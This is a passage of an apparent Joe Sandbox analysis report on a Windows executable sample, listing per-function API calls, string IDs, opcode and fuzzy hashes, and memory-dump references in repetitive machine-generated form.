                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FreeString$FormatMessage
                            • String ID: Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d$0x%08X - $No valid COM object!
                            • API String ID: 1522831054-3028990165
                            • Opcode ID: 89c31aabcd22fd5ae992dca47e15637c02272ea44b6d5395a1584f5a82345337
                            • Instruction ID: 4f8deb4f72dd2acf459051c55e846bda88d22ee218e31af3bb7ffc680f83590e
                            • Opcode Fuzzy Hash: 89c31aabcd22fd5ae992dca47e15637c02272ea44b6d5395a1584f5a82345337
                            • Instruction Fuzzy Hash: A441B43221879081EB359B26E4443E9B3A5FB9CBC8F484115EB8857BB9DF3CC585C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ObjectText$CapsCreateDeviceFaceMetricsSelectStock
                            • String ID: DISPLAY
                            • API String ID: 2440455471-865373369
                            • Opcode ID: 3b6490cdb523d863b71ae46264d85c8950df8627e986df0f72bebb4d6d43ac2b
                            • Instruction ID: a88ad51eab9cf9472562bfdfaf2b823180f10580f37f17e5a9fb8fab5af32e17
                            • Opcode Fuzzy Hash: 3b6490cdb523d863b71ae46264d85c8950df8627e986df0f72bebb4d6d43ac2b
                            • Instruction Fuzzy Hash: 1941D2356016418AFF7A8F26A4503E933A0F35CB9DF514029EF4A17BA8DB39CD81C784
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • free.LIBCMT ref: 000000014003C1A5
                              • Part of subcall function 00000001400CB11C: HeapFree.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB132
                              • Part of subcall function 00000001400CB11C: _errno.LIBCMT ref: 00000001400CB13C
                              • Part of subcall function 00000001400CB11C: GetLastError.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB144
                              • Part of subcall function 0000000140032520: GlobalUnlock.KERNEL32 ref: 00000001400325E1
                              • Part of subcall function 0000000140032520: CloseClipboard.USER32 ref: 00000001400325EE
                              • Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032601
                              • Part of subcall function 0000000140032520: PeekMessageW.USER32 ref: 0000000140032635
                              • Part of subcall function 0000000140032520: GetTickCount.KERNEL32 ref: 0000000140032649
                            • free.LIBCMT ref: 000000014003C263
                            • free.LIBCMT ref: 000000014003C4F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: free$CountTick$ClipboardCloseErrorFreeGlobalHeapLastMessagePeekUnlock_errno
                            • String ID: Next$_NewEnum
                            • API String ID: 837015515-2558596721
                            • Opcode ID: 0e42de6933edc6b9a24aa1a0c2d2662bb8ffef06cde564b77a18d14de9b95c00
                            • Instruction ID: 6040ff2caa944945ff0235510103580c3bf39fcf066016c23246ac8ac624bf49
                            • Opcode Fuzzy Hash: 0e42de6933edc6b9a24aa1a0c2d2662bb8ffef06cde564b77a18d14de9b95c00
                            • Instruction Fuzzy Hash: 22F16D32229B4086EB678B66E490BEA73A4F78C7C4F544116FB8E87BB4DB38C555C700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _getptd.LIBCMT ref: 00000001400CE183
                              • Part of subcall function 00000001400CE858: _amsg_exit.LIBCMT ref: 00000001400CE86E
                              • Part of subcall function 00000001400CDDA0: _getptd.LIBCMT ref: 00000001400CDDAA
                              • Part of subcall function 00000001400CDDA0: _amsg_exit.LIBCMT ref: 00000001400CDE47
                              • Part of subcall function 00000001400CDE5C: GetOEMCP.KERNEL32 ref: 00000001400CDE86
                              • Part of subcall function 00000001400D0A70: malloc.LIBCMT ref: 00000001400D0A9B
                              • Part of subcall function 00000001400D0A70: Sleep.KERNEL32(?,?,00000000,00000001400CF2DD,?,?,?,00000001400CF387,?,?,00000000,00000001400CE775,?,?,00000000,00000001400CE82C), ref: 00000001400D0AAE
                            • free.LIBCMT ref: 00000001400CE20E
                              • Part of subcall function 00000001400CB11C: HeapFree.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB132
                              • Part of subcall function 00000001400CB11C: _errno.LIBCMT ref: 00000001400CB13C
                              • Part of subcall function 00000001400CB11C: GetLastError.KERNEL32(?,?,00000000,00000001400CE840,?,?,00000000,00000001400CE863,?,?,?,00000001400CA78B,?,?,00000000,00000001400CFD1B), ref: 00000001400CB144
                            • _lock.LIBCMT ref: 00000001400CE23E
                            • free.LIBCMT ref: 00000001400CE2E1
                            • free.LIBCMT ref: 00000001400CE30D
                            • _errno.LIBCMT ref: 00000001400CE312
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                            • String ID:
                            • API String ID: 3894533514-0
                            • Opcode ID: de4f3cd7325e32a44cb7c5abdf586fc9e2e9a31b3b020617849d4ce1e34e6220
                            • Instruction ID: c8d432f25b2830cadf6994e55f8ad88d7c967c033c0ec6ede519a381c5d6de72
                            • Opcode Fuzzy Hash: de4f3cd7325e32a44cb7c5abdf586fc9e2e9a31b3b020617849d4ce1e34e6220
                            • Instruction Fuzzy Hash: E051BE326087C086E76E9B67A4403ED77A5F78CBC4F584116EB9A4B7B6CB38C842C701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: LongWindow_errno_invalid_parameter_noinfo
                            • String ID: 0x%08X$Memory limit reached (see #MaxMem in the help file).
                            • API String ID: 2099978093-1054076255
                            • Opcode ID: 49b9aaed20653e9ca980f25d2a667029c88103733370c5b75e13e890c001a026
                            • Instruction ID: 7b30c77d0acb16f7962a54d0be12ca5f616eecbe34915ebb0da638f97de7f8c9
                            • Opcode Fuzzy Hash: 49b9aaed20653e9ca980f25d2a667029c88103733370c5b75e13e890c001a026
                            • Instruction Fuzzy Hash: 1A61AF32205AC485EB239F26C4153E86762F74CBE8F854212FB5D1B6FACB78C986C341
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: CloseHandleInfofree
                            • String ID: %s (%d) : ==> Warning: %s$This variable has not been assigned a value.
                            • API String ID: 3828278840-1383411024
                            • Opcode ID: 772b751e9f597f1b8ca1c7c637dada4b4af7ad13f7dccc9e1cba28a48d79bb26
                            • Instruction ID: 5dd38dcd4147fb481e0460c211ebc023e50a6005edf4a01bc0057a899eed3b57
                            • Opcode Fuzzy Hash: 772b751e9f597f1b8ca1c7c637dada4b4af7ad13f7dccc9e1cba28a48d79bb26
                            • Instruction Fuzzy Hash: 6A412736B10B6089E715DBA6D8447DD3775F708BB8F150319EE6927AE8CB74884AC740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ClientCreateDestroyIconLongObjectRectReleaseSelect
                            • String ID: Can't create control.$static
                            • API String ID: 95896621-3511495095
                            • Opcode ID: 1833014ff571d9562c21aad47501b8bc12e09adb9581f1dc84a0c0d126db64ad
                            • Instruction ID: 9ba960178aa520753aaa2b02951bb381ca6e69ef9b22ce79844fd78d01c14a21
                            • Opcode Fuzzy Hash: 1833014ff571d9562c21aad47501b8bc12e09adb9581f1dc84a0c0d126db64ad
                            • Instruction Fuzzy Hash: 1E31C776605B808AEB52CF26E4807D977A1F74C798F149026EF4D57B68DB38C945CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ClientCreateLongObjectRectReleaseSelect
                            • String ID: Can't create control.$SysLink
                            • API String ID: 2656910855-3028581624
                            • Opcode ID: 9e70f8a7f5955ff780346c5fbb48bf70468a891e7bc55df200acd81a044c9cbe
                            • Instruction ID: 6e019788fd84dec84cc4dd4b38ea06d0ef5a717ad49a4d22eb47257a96f5e33a
                            • Opcode Fuzzy Hash: 9e70f8a7f5955ff780346c5fbb48bf70468a891e7bc55df200acd81a044c9cbe
                            • Instruction Fuzzy Hash: B721F576615B448AEB52CF2AE8807D973A0F74C798F145026EF8D97B78DB38C985CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ClientCreateLongObjectRectReleaseSelect
                            • String ID: Can't create control.$static
                            • API String ID: 2656910855-3511495095
                            • Opcode ID: 66ac87cc029eebdddeeedf784189bc13659f2cbb764c7a9fdb9b0023495c5a5d
                            • Instruction ID: 4b71c5653b93e6eddc4df025a45b7ab28ab1c10484b6187c656b0d2932efa0bf
                            • Opcode Fuzzy Hash: 66ac87cc029eebdddeeedf784189bc13659f2cbb764c7a9fdb9b0023495c5a5d
                            • Instruction Fuzzy Hash: 15210676615B448AEB52CF2AE8807D973A0F74C7A4F145026EF4D97B78DB38C985CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Global$AllocFreeLock
                            • String ID: GlobalAlloc$GlobalLock
                            • API String ID: 1811133220-3672399903
                            • Opcode ID: 9593341c33376db10766d63edea85d641170a012fe00d1c6813a9162e5f944b3
                            • Instruction ID: d12fda554cb3d94aa79ec9b1b9f7a6216919f67dbf5acb5e7c779fa3446c4a0a
                            • Opcode Fuzzy Hash: 9593341c33376db10766d63edea85d641170a012fe00d1c6813a9162e5f944b3
                            • Instruction Fuzzy Hash: D4115EB1601B4191EF4ACF2AF4953D863A0EB5CBD4F489026EB0D57375EE38C995C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Enum$CloseDeleteOpen
                            • String ID:
                            • API String ID: 2095303065-0
                            • Opcode ID: 546bb3373a8f0290214174c265ea9e279252af0e1408538725f9ccb342efc901
                            • Instruction ID: 504be43b3127dba2f9b47c61f08bd24f5020da245fa7b72fac9fca584a0f172e
                            • Opcode Fuzzy Hash: 546bb3373a8f0290214174c265ea9e279252af0e1408538725f9ccb342efc901
                            • Instruction Fuzzy Hash: 1031F132214B9592E7618B66F4847DA73A5F7897D4F500121FB8D43EA4DF3DC99ACB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Rect$Window$IntersectParent
                            • String ID:
                            • API String ID: 3824346474-0
                            • Opcode ID: 5331388bf6f54e97ffa5753d18a2fd0d68cc5592d2723d78bbfdf08a36391670
                            • Instruction ID: cc53a2a2c464ed8d33cf859a3762bb955268bb4e042470fb12445535b6a3f622
                            • Opcode Fuzzy Hash: 5331388bf6f54e97ffa5753d18a2fd0d68cc5592d2723d78bbfdf08a36391670
                            • Instruction Fuzzy Hash: C53193336186819ADB62CF36E44079AB7A1F789BC4F044301FB8957AB9DB38DD52CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoItemMenufreemalloc
                            • String ID: P
                            • API String ID: 2847912382-3110715001
                            • Opcode ID: 900013ece33a90f1785eaaf89873bcf3af1dac05ebb2df9192d03fc9a62ee6fa
                            • Instruction ID: 4d32ff928648402c52d8367afeadc000094e855469fe6d8f7da8d66d94738236
                            • Opcode Fuzzy Hash: 900013ece33a90f1785eaaf89873bcf3af1dac05ebb2df9192d03fc9a62ee6fa
                            • Instruction Fuzzy Hash: 2E51923230165086EB6A9B2BA4107AE62A1F79DBD4F144335FF5A07BE5DB39C981CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: wcsncpy
                            • String ID: This line does not contain a recognized action.${
                            • API String ID: 322933527-101845141
                            • Opcode ID: 6aa794c3f2c9ad134c660cadde4b1b398e06ef199636e0e14275ce214c07eda0
                            • Instruction ID: 1c2ce6a0c463966874f6d5257edbea0aa455576167841a736ff4c886dd4ffaef
                            • Opcode Fuzzy Hash: 6aa794c3f2c9ad134c660cadde4b1b398e06ef199636e0e14275ce214c07eda0
                            • Instruction Fuzzy Hash: F541E52971969086E7708F56E10036A7261EB5CBD4F44221AFF99C7BE8E73DC901C709
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                            • Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ClassNameProcessThreadWindow
                            • String ID: #32770
                            • API String ID: 2910564809-463685578
                            • Opcode ID: 3535a92801cd5c384f442ac5a97c48c2b42de6770fe99d5a95370b0049eafd43
                            • Instruction ID: 2a0b2f788977aea3b433878f58722216e345999e9635defa57f86d50f4b85747
                            • Opcode Fuzzy Hash: 3535a92801cd5c384f442ac5a97c48c2b42de6770fe99d5a95370b0049eafd43
                            • Instruction Fuzzy Hash: 3F010072604A84D6EB628F59E4443AA73B5F398BC8F584111EB8C57A68DF3CD9D5CB00
                            Uniqueness

                            Uniqueness Score: -1.00%